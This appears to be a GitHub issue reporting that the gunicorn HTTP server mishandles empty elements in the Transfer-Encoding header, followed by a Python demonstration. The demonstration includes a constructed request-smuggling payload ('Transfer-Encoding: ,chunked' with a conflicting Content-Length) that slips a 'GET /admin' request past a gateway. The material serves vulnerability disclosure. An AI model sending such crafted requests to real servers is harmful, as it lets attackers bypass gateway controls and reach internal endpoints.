benoitc / gunicorn

gunicorn 'Green Unicorn' is a WSGI HTTP Server for UNIX, fast clients and sleepy applications.

Home Page: http://www.gunicorn.org

Improper handling of empty list elements in `Transfer-Encoding` header values

kenballus opened this issue · comments

Gunicorn doesn't properly handle Transfer-Encoding header values with empty list elements. Transfer-Encoding is a list-valued header, and RFC 9110 says this about list-valued header parsing:

A recipient MUST parse and ignore a reasonable number of empty list elements: enough to handle common mistakes by senders that merge values, but not so much that they could be used as a denial-of-service mechanism.

Thus, `Transfer-Encoding: ,chunked` should be equivalent to `Transfer-Encoding: chunked`. Gunicorn does not make this distinction, and is thus vulnerable to request smuggling when deployed behind gateway servers that do (and also don't normalize out the comma). There are a few widely-deployed load balancers that exhibit this behavior.
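The desync described above, as an added example that is not part of the issue and not gunicorn's code. It pairs an RFC 9110 style list-header parser (empty elements dropped, with an assumed cap of 8 so the rule cannot be abused for denial of service) with a naive parser that compares the raw value as a single token, then frames the same constructed request with both to show where a leftover request appears. The raw request, the `is_chunked` helpers and the cap are all constructed for illustration; the chunked decoder ignores trailer fields for brevity.

```python
from typing import Callable, Dict, List, Tuple

# RFC 9110 only says "a reasonable number" of empty elements; 8 is an assumed bound.
MAX_EMPTY_ELEMENTS = 8


def parse_list_header(value: str, max_empty: int = MAX_EMPTY_ELEMENTS) -> List[str]:
    """Split a comma-separated list header (RFC 9110 section 5.6.1).

    Empty elements such as the one in ",chunked" are ignored up to max_empty,
    after which the value is rejected instead of silently tolerated.
    """
    elements: List[str] = []
    empties = 0
    for raw in value.split(","):
        item = raw.strip(" \t")  # strip optional whitespace around each element
        if not item:
            empties += 1
            if empties > max_empty:
                raise ValueError("too many empty list elements in header value")
            continue
        elements.append(item.lower())  # transfer-coding names are case-insensitive
    return elements


def too_many_empties(value: str) -> bool:
    """True when the RFC-style parser refuses the value (helper for testing the cap)."""
    try:
        parse_list_header(value)
    except ValueError:
        return True
    return False


def rfc_is_chunked(te: str) -> bool:
    """Chunked framing applies when 'chunked' is the final transfer coding."""
    codings = parse_list_header(te)
    return bool(codings) and codings[-1] == "chunked"


def naive_is_chunked(te: str) -> bool:
    """Illustrative model of a parser that does not drop empty list elements:
    the raw value must equal 'chunked', so ',chunked' is not recognised.
    This models the behaviour the issue describes; it is not gunicorn's code."""
    return te.strip().lower() == "chunked"


def decode_chunked(data: bytes) -> Tuple[bytes, int]:
    """Decode a chunked body; return (decoded, bytes_consumed). No trailer support."""
    pos = 0
    out = bytearray()
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0].strip(), 16)  # drop chunk extensions
        pos = end + 2
        if size == 0:
            if data[pos:pos + 2] != b"\r\n":
                raise ValueError("trailer fields are not supported in this example")
            return bytes(out), pos + 2
        out += data[pos:pos + size]
        pos += size
        if data[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk data")
        pos += 2


def split_request(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Separate request line, header map (lower-cased names) and body bytes."""
    head, _, payload = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, payload


def frame_body(raw: bytes, is_chunked: Callable[[str], bool]) -> Tuple[bytes, bytes]:
    """Return (body, leftover) as a server using the given TE check would see it.
    A hardened server should instead reject requests carrying both
    Transfer-Encoding and Content-Length (RFC 9112 section 6.3)."""
    _, headers, payload = split_request(raw)
    te = headers.get("transfer-encoding")
    if te is not None and is_chunked(te):
        body, consumed = decode_chunked(payload)
    else:
        consumed = int(headers.get("content-length", "0"))
        body = payload[:consumed]
    return body, payload[consumed:]


# Constructed request: the gateway frames it by chunks (RFC parser), the backend by Content-Length.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: internal\r\n\r\n"
RAW_REQUEST = (
    b"POST / HTTP/1.1\r\nHost: example\r\n"
    b"Transfer-Encoding: ,chunked\r\nContent-Length: 4\r\n\r\n"
    + f"{len(SMUGGLED):x}".encode() + b"\r\n" + SMUGGLED + b"\r\n0\r\n\r\n"
)


def demo() -> Dict[str, bytes]:
    """Leftover bytes each side would treat as the start of the next request."""
    _, front_left = frame_body(RAW_REQUEST, rfc_is_chunked)
    _, back_left = frame_body(RAW_REQUEST, naive_is_chunked)
    return {"gateway_leftover": front_left, "backend_leftover": back_left}
```

Running `demo()` shows the gateway consuming the whole chunked body (no leftover) while the naive backend stops after 4 bytes and is left holding `GET /admin ...` as a second request on the same connection; that difference is the smuggling primitive the issue describes.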